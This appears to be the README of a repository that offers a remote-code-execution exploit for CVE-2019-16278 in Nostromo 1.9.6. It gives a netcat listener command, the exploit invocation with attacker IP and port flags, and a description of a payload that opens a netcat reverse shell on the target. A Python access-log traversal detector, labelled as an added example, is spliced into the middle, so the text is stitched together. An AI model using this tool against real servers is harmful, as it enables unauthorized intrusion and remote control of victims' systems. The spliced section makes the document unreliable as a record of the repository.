Description
This repository contains an exploit for CVE-2019-16278 in Nostromo Web Server 1.9.6, allowing remote code execution via a directory traversal vulnerability. The script uses pwntools to establish a reverse shell. For educational and authorized testing use only.
Introduction
# CVE-2019-16278-Nostromo-1.9.6-RCE
## Requirements
- **Python 3.x**
- **pwntools** library
To install `pwntools`, use:
```bash
pip3 install pwntools
```
## Usage
### Setup
1. **Start a Listener**: On the attacking machine, start a listener on the specified port to receive the reverse shell:
```bash
nc -lvnp <attacker-port>
```
2. **Run the Script**: Use the following command to execute the exploit script. Replace the values as needed.
```bash
python3 exploit.py --attacker-ip <attacker-ip> --attacker-port <attacker-port> [-t target-ip] [-p target-port]
```
### Example
```bash
python3 exploit.py --attacker-ip 10.10.14.15 --attacker-port 4444 -t 10.10.10.165 -p 80
```
In this example:
- `--attacker-ip 10.10.14.15` is the IP address of the attacking machine.
- `--attacker-port 4444` is the port on which the attacking machine is listening for the reverse shell.
- `-t 10.10.10.165` specifies the target IP (default is `10.10.10.165`).
- `-p 80` specifies the target port (default is `80`).
### Script Options
| Option | Description | Default |
|-------------------|------------------------------------------------------|-----------------|
| `-t, --target` | IP address of the remote host | 10.10.10.165 |
| `-p, --port` | Port on the remote host to target | 80 |
| `--attacker-ip` | IP address of the attacking machine for the reverse shell | None (required) |
| `--attacker-port` | Port on the attacking machine for the reverse shell | None (required) |
### Script Flow
1. **Warning Message**: Reminds the user to start a listener on the attacking machine.
2. **Payload Construction**: Builds an HTTP request with the reverse shell command using netcat (`nc`).
3. **Payload Execution**: Sends the payload to the target server and attempts to receive a reverse shell.
4. **Retries**: If the initial attempt fails, the script retries up to 3 times with feedback on each attempt.
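From the defender's side, a directory traversal request like the one this flow sends can be looked for in the web server's access log. The following is an added example, not part of this repository: it assumes Common Log Format lines, the function names `path_findings` and `scan` are hypothetical, and the sample log lines are constructed.

```python
import re
from urllib.parse import unquote_to_bytes

# Assumption: Common Log Format lines with the request line in the first quoted field.
REQUEST_RE = re.compile(rb'^(\S+) .*?"([A-Z]+) (\S+)[^"]*" (\d{3})')

def path_findings(raw_path):
    """Return the reasons a request path looks like a traversal attempt."""
    path = raw_path.split(b"?", 1)[0]
    for _ in range(3):  # decode repeatedly so %252e-style double encoding is unwrapped
        decoded = unquote_to_bytes(path)
        if decoded == path:
            break
        path = decoded
    findings = []
    if any(b < 0x20 or b == 0x7F for b in path):
        findings.append("control-character")
        # Drop control bytes so a segment split by one is still compared as a whole.
        path = bytes(b for b in path if b >= 0x20 and b != 0x7F)
    if b".." in path.replace(b"\\", b"/").split(b"/"):
        findings.append("dot-dot-segment")
    return findings

def scan(lines):
    """Return (client, method, status, served, reasons) for each suspicious request."""
    alerts = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue
        client, method, path, status = m.groups()
        reasons = path_findings(path)
        if reasons:
            # served=True means the server did not reject the request: triage first.
            alerts.append((client.decode(), method.decode(), int(status),
                           int(status) < 400, reasons))
    return alerts

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    b'192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /index.html HTTP/1.1" 200 512',
    b'192.0.2.44 - - [01/Jan/2024:10:00:05 +0000] "GET /../../etc/passwd HTTP/1.1" 400 0',
    b'192.0.2.44 - - [01/Jan/2024:10:00:06 +0000] "GET /%2e%2e/%2e%2e/etc/passwd HTTP/1.1" 200 0',
    b'192.0.2.44 - - [01/Jan/2024:10:00:07 +0000] "GET /a/%252e%252e/b HTTP/1.1" 404 0',
    b'192.0.2.44 - - [01/Jan/2024:10:00:08 +0000] "GET /img/logo.png%00.html HTTP/1.1" 200 0',
    b'192.0.2.10 - - [01/Jan/2024:10:00:09 +0000] "GET /docs/v1..2/notes.txt HTTP/1.1" 200 90',
]

if __name__ == "__main__":
    for alert in scan(SAMPLE_LOG):
        print(alert)
```

Alerts with `served` set to `True` are the ones to correlate first with outbound connections from the web server host.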
### Code Flow Example
If successful, you should receive a reverse shell on your listener with access to the target system.
## Disclaimer
This script is intended for educational purposes and authorized testing only. Unauthorized access to computer systems is illegal. The author and contributors are not responsible for any misuse or damage caused by this tool. Use it responsibly and only on systems you have permission to test.
File snapshot
[4.0K] /data/pocs/c2faf57084fd3739c206aa29c08168ebd007f1d5
├── [2.6K] poc.py
├── [2.7K] README.md
└── [ 16] requirements.txt
0 directories, 3 files